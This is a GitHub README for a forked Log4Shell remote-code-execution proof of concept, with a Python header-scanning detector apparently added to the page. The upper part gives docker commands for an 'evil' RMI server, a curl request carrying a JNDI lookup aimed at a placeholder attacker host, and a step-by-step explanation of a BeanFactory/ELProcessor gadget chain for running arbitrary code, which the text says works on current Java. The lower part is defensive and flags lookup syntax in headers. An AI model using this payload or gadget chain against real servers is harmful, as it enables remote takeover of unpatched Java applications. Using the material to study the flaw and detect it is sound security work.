jermainlaforce / log4shell_poc
This project forked from drahosj/log4shell_poc
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
```
$ docker build -t evil:latest .
$ docker run -p 1097:1097 evil:latest
```

```
# vulnerable application container is also running
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:rmi://<EVIL-RMI-IP>:1097/Object}'
```

Vulnerable app: https://github.com/drahosj/log4shell-vulnerable-app

credit: https://www.veracode.com/blog/research/exploiting-jndi-injections-java

Actual notes:

Uses the technique (BeanFactory + ELProcessor + "forceString") highlighted in https://www.veracode.com/blog/research/exploiting-jndi-injections-java. The tl;dr on that:

1. A ResourceRef overrides the normal JNDI reference behavior with a set of key=value pairs intended to populate a Bean via setters.
2. Java still lets you specify a custom factory, if that factory is in the classpath.
3. BeanFactory works with ResourceRefs to call the setters and populate the new bean.
4. The forceString directive in a ResourceRef lets you override the name of a setter from setFoo to anything you want; when assigning foo it will call that name.
5. The ELProcessor class works as a gadget, since its eval method is a valid bean setter (though named incorrectly).
6. Create a forceString rule to set "x" by calling "eval" - x doesn't even have to be a real field of ELProcessor.
7. Try to set x to a string.
8. BeanFactory calls ELProcessor.eval() on the string, because forceString makes eval() the setter for x.
9. Execute arbitrary EL.

Other gadget classes probably exist. This demo only works against a patched version of the vulnerable app that hacks the gadget classes into the classpath. Note that it's not entirely unreasonable for the relevant jars to be included - any full Tomcat deployment (not just Spring Boot's embedded Tomcat) will definitely have them.

A note on Java versions

Using gadgets seems to be possible even on the most current Java, and the gadgets still exist on current versions of stuff. This compiles with a slightly older JDK just to avoid problems with the "internal and proprietary" ReferenceWrapper class. Recent JDKs really complain about that a lot - the easiest solution is to just stick to one that doesn't.
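The request above only works because the application logs an attacker-controlled header and Log4j resolves the `${jndi:...}` lookup inside it. The defender-side counterpart is to spot that lookup syntax in inbound header values before, or while, they reach the logger. The following Python is an added detection example written for this page; it is not part of the repository and not the PoC's own code. The sample requests, the `Finding` dataclass and the function names are constructed for illustration; the attacker hosts are placeholders rather than real addresses.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample requests (header name -> value). Not taken from the repo.
# The first mirrors the README's curl header with a placeholder RMI host.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"Host": "127.0.0.1:8080",
     "X-Api-Version": "${jndi:rmi://EVIL-RMI-IP-PLACEHOLDER:1097/Object}"},
    {"Host": "127.0.0.1:8080",
     "User-Agent": "${jndi:ldap://EVIL-LDAP-IP-PLACEHOLDER:1389/a}"},
    {"Host": "127.0.0.1:8080", "X-Api-Version": "${date:yyyy-MM-dd}"},
    {"Host": "127.0.0.1:8080", "X-Api-Version": "2.1.0"},
    {"Host": "127.0.0.1:8080",
     "User-Agent": "Mozilla/5.0 (X11; Linux) $HOME ${not-a-lookup"},
]

# Any "jndi:" scheme prefix inside a lookup is the critical case.
JNDI_RE = re.compile(r"\bjndi\s*:", re.IGNORECASE)


@dataclass
class Finding:
    header: str
    severity: str
    lookup: str


def extract_lookups(value: str) -> List[str]:
    """Return every outermost, brace-balanced ${...} expression in value.

    An unterminated ${ at the end of the value is returned as-is: a benign
    client has no reason to send Log4j lookup syntax at all, so a half-written
    lookup is still worth a finding.
    """
    lookups: List[str] = []
    i = 0
    while i < len(value) - 1:
        if value[i] == "$" and value[i + 1] == "{":
            depth = 0
            j = i
            while j < len(value):
                if value.startswith("${", j):
                    depth += 1
                    j += 2
                    continue
                if value[j] == "}":
                    depth -= 1
                    if depth == 0:
                        lookups.append(value[i:j + 1])
                        break
                j += 1
            else:
                # no closing brace found: keep the remainder as one lookup
                lookups.append(value[i:])
                break
            i = j + 1
        else:
            i += 1
    return lookups


def severity_of(lookup: str) -> str:
    """Rate one extracted lookup expression."""
    if JNDI_RE.search(lookup):
        return "critical"   # JNDI lookup: the Log4Shell trigger itself
    if lookup.count("${") > 1:
        return "high"       # nested lookups are never sent by a normal client
    return "medium"         # any other Log4j lookup in a header is suspicious


def scan_request(headers: Dict[str, str]) -> List[Finding]:
    """Scan every header value of one request and return its findings."""
    findings: List[Finding] = []
    for name, value in headers.items():
        for lookup in extract_lookups(value):
            findings.append(Finding(name, severity_of(lookup), lookup))
    return findings


def scan_all(requests: List[Dict[str, str]]) -> List[List[Finding]]:
    """Scan a batch of requests; result index i holds request i's findings."""
    return [scan_request(h) for h in requests]


if __name__ == "__main__":
    for idx, findings in enumerate(scan_all(SAMPLE_REQUESTS)):
        for f in findings:
            print(f"request {idx}: {f.severity:8} {f.header}: {f.lookup}")
```

The scanner deliberately flags every `${...}` lookup in a header, not just `jndi:`, and rates nested lookups as high without trying to resolve them: a header value is not a place where Log4j lookup syntax legitimately appears, so the cheap, robust rule is to alert on the syntax itself and let the `jndi:` check only raise the severity. The same logic can be run over an access log that records header values, or placed in a request filter ahead of the logging call.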